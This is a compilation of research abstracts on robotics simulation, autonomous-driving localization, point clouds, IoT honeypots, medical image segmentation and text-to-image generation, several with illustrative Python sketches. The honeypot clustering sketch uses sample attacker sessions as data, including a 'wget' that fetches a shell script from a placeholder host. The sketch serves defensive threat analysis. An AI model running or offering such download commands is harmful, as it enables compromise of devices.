The roadheader is an engineering robot widely used in underground engineering and the mining industry. Interactive dynamics simulation of the roadheader is a fundamental problem in unmanned excavation and virtual-reality training. However, current research is based only on traditional animation techniques or commercial game engines, and few studies apply the real-time physics simulation of computer graphics to roadheader robots. This paper presents a physics-based simulation system for roadheader robots. To this end, an improved multibody simulation method based on generalized coordinates is proposed. First, our simulation method describes the robot dynamics in generalized coordinates. Compared with state-of-the-art methods, our method is more stable and accurate: numerical results show that, for the same number of iterations, its error is significantly smaller than that of game engines. Second, we adopt a symplectic Euler integrator for the dynamics iteration instead of the conventional fourth-order Runge-Kutta (RK4) method. Compared with other integrators, our method is more stable with respect to energy drift in long-term simulation. Test results show that the system achieves real-time interactive performance at 60 frames per second (FPS). Furthermore, we propose a model format for roadheader robot modeling to implement the system. Our interactive roadheader simulation system meets the requirements of interactivity, accuracy, and stability.
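To illustrate the integrator choice, the following sketch (not the paper's code; the single-pendulum dynamics, names, and step count are illustrative assumptions) applies semi-implicit (symplectic) Euler to a simple conservative system in one generalized coordinate and checks that the energy error stays bounded over a long run, which is the stability property contrasted with RK4 above.

```python
import math

# Illustrative sketch (not from the paper): semi-implicit (symplectic) Euler
# for a frictionless pendulum in the generalized coordinate q (angle).
g, L, m = 9.81, 1.0, 1.0

def acceleration(q):
    # Generalized force divided by generalized mass for the pendulum.
    return -(g / L) * math.sin(q)

def symplectic_euler_step(q, qdot, dt):
    # Update velocity first, then position with the *new* velocity:
    # this ordering is what keeps the energy error bounded over long runs.
    qdot = qdot + dt * acceleration(q)
    q = q + dt * qdot
    return q, qdot

def energy(q, qdot):
    return 0.5 * m * (L * qdot) ** 2 + m * g * L * (1.0 - math.cos(q))

q, qdot, dt = 1.0, 0.0, 0.01
e0 = energy(q, qdot)
for step in range(600_000):      # roughly 100 minutes of simulated time
    q, qdot = symplectic_euler_step(q, qdot, dt)
print("relative energy drift:", abs(energy(q, qdot) - e0) / e0)
```

A non-symplectic integrator such as RK4, applied to the same conservative system over the same horizon, typically shows a slowly accumulating energy error; that accumulation is the drift referred to in the abstract.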
As the autonomous driving industry slowly matures, visual map localization is quickly becoming the standard approach for localizing a vehicle as precisely as possible. Thanks to the rich data returned by visual sensors such as cameras and LiDARs, researchers can build maps of varying levels of detail and use them to achieve high vehicle localization accuracy and stability in urban environments. In contrast to popular SLAM approaches, visual map localization relies on pre-built maps and improves localization accuracy purely by avoiding error accumulation and drift. We define visual map localization as a two-stage process. In the place recognition stage, the vehicle's initial position in the map is determined by comparing the visual sensor output with a set of geo-tagged map regions. Then, in the map metric localization stage, the vehicle is tracked as it moves across the map by continuously aligning the visual sensor output with the current map region being traversed. In this paper, we survey, discuss, and compare state-of-the-art LiDAR-based, camera-based, and cross-modal methods for both stages of visual map localization, to highlight the strengths of each approach.
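The two-stage definition above can be summarized as pseudocode. The sketch below is only a schematic of that definition; the map, descriptor, and alignment interfaces (`describe`, `similarity`, `align`, `current_region`) are hypothetical placeholders rather than APIs from any surveyed method.

```python
# Schematic of the two-stage visual map localization process described above.
# All callables here are hypothetical placeholders.

def place_recognition(sensor_frame, geo_tagged_regions, describe, similarity):
    """Stage 1: find the map region that best matches the current sensor output."""
    query = describe(sensor_frame)                      # global descriptor (camera or LiDAR)
    best = max(geo_tagged_regions,
               key=lambda region: similarity(query, describe(region)))
    return best.center_pose                             # coarse initial pose in the map

def metric_localization(initial_pose, sensor_stream, current_region, align):
    """Stage 2: track the vehicle by aligning each frame against the traversed region."""
    pose = initial_pose
    for frame in sensor_stream:
        # align() returns a refined pose, e.g. by registering the frame
        # against the local map around the previous estimate.
        pose = align(frame, current_region(pose), initial_guess=pose)
        yield pose
```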
Point cloud semantic segmentation has attracted attention because of its robustness to lighting conditions, which makes it an ideal semantic solution for autonomous driving. However, given the heavy computational burden and bandwidth requirements of neural networks, putting all of the computation into the vehicle's electronic control unit (ECU) is neither efficient nor practical. In this paper, we propose a lightweight point cloud semantic segmentation network based on the range view. Thanks to its simple pre-processing and standard convolutions, it runs efficiently on deep learning accelerators such as a DPU. In addition, we build a near-sensor computing system for autonomous vehicles: an FPGA-based deep learning accelerator core (DPU) placed next to the LiDAR sensor performs the point cloud pre-processing and the segmentation network. By leaving only the post-processing step to the ECU, this solution greatly relieves the ECU's computational burden and thus shortens decision-making and vehicle reaction latency. Our semantic segmentation network achieves 10 frames per second (FPS) on a Xilinx DPU with a computational efficiency of 42.5 GOP/W.
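Range-view segmentation of the kind described relies on a spherical projection of the LiDAR point cloud into a 2D range image, so that standard 2D convolutions (and hence an accelerator such as a DPU) can process it. The snippet below is a generic version of that pre-processing step; the image size and vertical field of view are assumed values, not the paper's configuration.

```python
import numpy as np

def spherical_projection(points, H=64, W=2048, fov_up_deg=3.0, fov_down_deg=-25.0):
    """Project an (N, 3) LiDAR point cloud to an H x W range image.
    Generic range-view pre-processing; all parameters are illustrative."""
    x, y, z = points[:, 0], points[:, 1], points[:, 2]
    r = np.linalg.norm(points, axis=1)                  # range per point
    yaw = np.arctan2(y, x)                              # horizontal angle
    pitch = np.arcsin(np.clip(z / np.maximum(r, 1e-8), -1.0, 1.0))

    fov_up, fov_down = np.radians(fov_up_deg), np.radians(fov_down_deg)
    fov = fov_up - fov_down

    u = 0.5 * (1.0 - yaw / np.pi) * W                   # column index
    v = (1.0 - (pitch - fov_down) / fov) * H            # row index
    u = np.clip(np.floor(u), 0, W - 1).astype(np.int32)
    v = np.clip(np.floor(v), 0, H - 1).astype(np.int32)

    range_image = np.zeros((H, W), dtype=np.float32)
    range_image[v, u] = r                               # later points overwrite earlier ones
    return range_image
```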
The irregularity and disorder of point clouds pose many challenges for point cloud analysis. PointMLP showed that geometric information is not the only key factor in point cloud analysis: it achieved promising results with a simple multi-layer perceptron (MLP) structure equipped with a geometric affine module. However, such MLP-like structures aggregate features only with fixed weights, ignoring differences in the semantic information carried by different point features. We therefore propose a new point-vector representation of point features that improves feature aggregation through an inductive bias: the direction introduced by the vector representation dynamically modulates how two point features are aggregated according to their semantic relationship. Based on this, we design a novel Point2Vector MLP architecture. Experiments show that it achieves state-of-the-art performance on the classification task of the ScanObjectNN dataset, a 1% improvement over the previous best method. We hope our approach helps people better understand the role of semantic information in point cloud analysis and encourages the exploration of more and better feature representations and other approaches.
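As a rough illustration of direction-aware aggregation, the sketch below weights each neighbor feature by its cosine similarity to the center feature before pooling, so a neighbor's contribution depends on its semantic relationship rather than on a fixed weight. The specific weighting is an assumption made for illustration only and is not the actual Point2Vector operator.

```python
import torch
import torch.nn.functional as F

def direction_modulated_aggregation(center_feat, neighbor_feats):
    """Illustrative only: aggregate neighbor features with weights that depend
    on the direction (cosine similarity) between feature vectors, instead of
    fixed weights. center_feat: (C,), neighbor_feats: (K, C)."""
    # Cosine similarity stands in for the "semantic relationship" that
    # modulates how strongly each neighbor contributes.
    sim = F.cosine_similarity(neighbor_feats, center_feat.unsqueeze(0), dim=1)  # (K,)
    weights = torch.softmax(sim, dim=0)                                          # (K,)
    return (weights.unsqueeze(1) * neighbor_feats).sum(dim=0)                    # (C,)
```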
The growing number of Internet of Things (IoT) devices makes it imperative to understand the real-world cybersecurity threats they face. While honeypots have historically been used as decoy devices to help researchers and organizations better understand the dynamics of threats on a network and their impact, IoT devices pose unique challenges for this purpose because of the variety of devices and their physical connections. In this work, by observing the behavior of real-world attackers in a low-interaction honeypot ecosystem, we (1) present a new approach for creating a multi-phased, multi-faceted honeypot ecosystem that gradually increases the sophistication of the honeypots' interactions with adversaries, (2) design and develop a low-interaction honeypot for cameras that allows researchers to gain a deeper understanding of attackers' goals, and (3) devise an innovative data analytics method to identify those goals. Our honeypots have been active for over three years, and we were able to collect increasingly sophisticated attack data in each phase. Furthermore, our analysis shows that the vast majority of attack activities captured by the honeypots share significant similarities and can be clustered and grouped to better understand the goals, patterns, and trends of IoT attacks in the wild.
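As one hypothetical example of how captured attack activity could be clustered by similarity (the feature choice and clustering algorithm below are assumptions, not the authors' analytics pipeline), command sequences recorded in honeypot sessions can be vectorized and grouped:

```python
# Illustrative sketch only: grouping captured attacker command sequences by
# textual similarity, in the spirit of the clustering described above.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import DBSCAN

sessions = [
    "enable; system; shell; sh; cat /proc/mounts",
    "enable; system; shell; sh; cat /proc/mounts; wget http://x/y.sh",
    "GET /cgi-bin/admin.cgi?cmd=reboot",
]

# Character n-gram TF-IDF captures near-duplicate command sequences.
vectors = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5)).fit_transform(sessions)
labels = DBSCAN(eps=0.7, min_samples=2, metric="cosine").fit_predict(vectors)
for session, label in zip(sessions, labels):
    print(label, session[:50])
```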
Deep learning provides a powerful new approach to many computer vision tasks. Height prediction from aerial images is one of the tasks that has benefited greatly from the deployment of deep learning, replacing older multi-view geometry techniques. This letter proposes a two-stage approach in which a multi-task neural network is first used to predict a height map from a single RGB aerial input image. We also include a second refinement step that produces higher-quality height maps. Experiments on two publicly available datasets show that our method produces state-of-the-art results. Code is available at https://github.com/melhousni/dsmnet.
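A schematic of such a two-stage pipeline, with placeholder modules rather than the actual DSMNet architecture, might look as follows:

```python
import torch
import torch.nn as nn

# Schematic of a two-stage height prediction pipeline as described above;
# the submodules are placeholders, not the published architecture.
class TwoStageHeightEstimator(nn.Module):
    def __init__(self, multitask_net: nn.Module, refinement_net: nn.Module):
        super().__init__()
        self.multitask_net = multitask_net    # stage 1: RGB -> coarse height (+ auxiliary tasks)
        self.refinement_net = refinement_net  # stage 2: coarse height -> refined height

    def forward(self, rgb: torch.Tensor) -> torch.Tensor:
        coarse_height, *aux_outputs = self.multitask_net(rgb)
        refined_height = self.refinement_net(coarse_height)
        return refined_height
```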
In this chapter, we review and discuss the transformation of AI technology in HCI/UX work and assess how AI technology will change how we do the work. We first discuss how AI can be used to enhance the result of user research and design evaluation. We then discuss how AI technology can be used to enhance HCI/UX design. Finally, we discuss how AI-enabled capabilities can improve UX when users interact with computing systems, applications, and services.
An increasing number of public datasets have shown a marked clinical impact on assessing anatomical structures. However, each of the datasets is small, partially labeled, and rarely investigates severe tumor subjects. Moreover, current models are limited to segmenting specific organs/tumors, which can not be extended to novel domains and classes. To tackle these limitations, we introduce embedding learned from Contrastive Language-Image Pre-training (CLIP) to segmentation models, dubbed the CLIP-Driven Universal Model. The Universal Model can better segment 25 organs and 6 types of tumors by exploiting the semantic relationship between abdominal structures. The model is developed from an assembly of 14 datasets with 3,410 CT scans and evaluated on 6,162 external CT scans from 3 datasets. We rank first on the public leaderboard of the Medical Segmentation Decathlon (MSD) and achieve the state-of-the-art results on Beyond The Cranial Vault (BTCV). Compared with dataset-specific models, the Universal Model is computationally more efficient (6x faster), generalizes better to CT scans from varying sites, and shows stronger transfer learning performance on novel tasks. The design of CLIP embedding enables the Universal Model to be easily extended to new classes without catastrophically forgetting the previously learned classes.
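The general idea of conditioning a segmentation model on CLIP text embeddings can be sketched as below; the projection layer, tensor shapes, and prompt format are illustrative assumptions, not the Universal Model's actual design.

```python
import torch
import torch.nn as nn

# Minimal sketch of CLIP-driven segmentation: class names are encoded with a
# (frozen) text encoder, and each class embedding conditions a per-class mask
# prediction. This illustrates the concept only, not the Universal Model itself.
class TextDrivenSegHead(nn.Module):
    def __init__(self, feat_dim=256, text_dim=512):
        super().__init__()
        self.project = nn.Linear(text_dim, feat_dim)  # map text embeddings into feature space

    def forward(self, voxel_feats, class_text_embeds):
        # voxel_feats: (B, C, D, H, W) features from a 3D segmentation backbone
        # class_text_embeds: (K, text_dim) CLIP embeddings of prompts such as
        # "a computerized tomography of a liver" (prompt wording assumed)
        class_vecs = self.project(class_text_embeds)               # (K, C)
        logits = torch.einsum("bcdhw,kc->bkdhw", voxel_feats, class_vecs)
        return logits                                              # one mask logit map per class
```

Because classes are addressed through text embeddings rather than fixed output channels, adding a new organ or tumor type in such a scheme amounts to adding a new prompt, which is consistent with the extensibility claim above.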
Recent advances in self-supervised learning (SSL) in computer vision are primarily comparative; their goal is to preserve invariant and discriminative semantics in latent representations by comparing siamese image views. However, the preserved high-level semantics do not contain enough local information, which is vital in medical image analysis (e.g., image-based diagnosis and tumor segmentation). To mitigate the locality problem of comparative SSL, we propose to incorporate the task of pixel restoration for explicitly encoding more pixel-level information into high-level semantics. We also address the preservation of scale information, a powerful aid to image understanding that has not drawn much attention in SSL. The resulting framework can be formulated as a multi-task optimization problem on the feature pyramid. Specifically, we conduct multi-scale pixel restoration and siamese feature comparison in the pyramid. In addition, we propose non-skip U-Net to build the feature pyramid and develop sub-crop to replace multi-crop in 3D medical imaging. The proposed unified SSL framework (PCRLv2) surpasses its self-supervised counterparts on various tasks, including brain tumor segmentation (BraTS 2018), chest pathology identification (ChestX-ray, CheXpert), pulmonary nodule detection (LUNA), and abdominal organ segmentation (LiTS), sometimes outperforming them by large margins with limited annotations.
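A multi-task objective of the kind described, combining pixel restoration with siamese feature comparison at each pyramid scale, could be sketched as follows; the specific loss terms and weighting are assumptions rather than PCRLv2's implementation.

```python
import torch
import torch.nn.functional as F

# Sketch of a multi-scale SSL objective: a pixel-restoration term plus a
# siamese feature-comparison term at each pyramid scale. Loss choices and
# weights are illustrative assumptions.
def multiscale_ssl_loss(restored_pyramid, target_pyramid, feats_view1, feats_view2,
                        restore_weight=1.0, compare_weight=1.0):
    loss = 0.0
    for restored, target, f1, f2 in zip(restored_pyramid, target_pyramid,
                                        feats_view1, feats_view2):
        # Pixel restoration: reconstruct the original image content at this scale.
        loss = loss + restore_weight * F.mse_loss(restored, target)
        # Siamese comparison: pull the two views' features together at this scale.
        cos = F.cosine_similarity(f1.flatten(1), f2.flatten(1), dim=1).mean()
        loss = loss + compare_weight * (1.0 - cos)
    return loss
```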
We present Muse, a text-to-image Transformer model that achieves state-of-the-art image generation performance while being significantly more efficient than diffusion or autoregressive models. Muse is trained on a masked modeling task in discrete token space: given the text embedding extracted from a pre-trained large language model (LLM), Muse is trained to predict randomly masked image tokens. Compared to pixel-space diffusion models, such as Imagen and DALL-E 2, Muse is significantly more efficient due to the use of discrete tokens and requiring fewer sampling iterations; compared to autoregressive models, such as Parti, Muse is more efficient due to the use of parallel decoding. The use of a pre-trained LLM enables fine-grained language understanding, translating to high-fidelity image generation and the understanding of visual concepts such as objects, their spatial relationships, pose, cardinality etc. Our 900M parameter model achieves a new SOTA on CC3M, with an FID score of 6.06. The Muse 3B parameter model achieves an FID of 7.88 on zero-shot COCO evaluation, along with a CLIP score of 0.32. Muse also directly enables a number of image editing applications without the need to fine-tune or invert the model: inpainting, outpainting, and mask-free editing. More results are available at https://muse-model.github.io
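The masked-token training objective described above follows the generic masked modeling recipe sketched below; the transformer interface, mask-token id, and fixed masking ratio are placeholders for illustration, not Muse's implementation.

```python
import torch
import torch.nn.functional as F

# Sketch of a masked-token training step for a text-conditioned image-token
# transformer. Shapes, the mask-token id, and the fixed mask ratio are assumed.
def masked_token_loss(transformer, image_tokens, text_embedding, mask_token_id,
                      mask_ratio=0.5):
    # image_tokens: (B, N) discrete VQ token ids; text_embedding: (B, T, D)
    B, N = image_tokens.shape
    mask = torch.rand(B, N, device=image_tokens.device) < mask_ratio
    inputs = image_tokens.masked_fill(mask, mask_token_id)

    logits = transformer(inputs, text_embedding)        # (B, N, vocab_size)
    # Cross-entropy only on the masked positions the model must reconstruct.
    return F.cross_entropy(logits[mask], image_tokens[mask])
```

At inference time, a model trained this way can fill in many masked tokens per step (parallel decoding) instead of emitting one token at a time, which is the efficiency advantage over autoregressive models noted in the abstract.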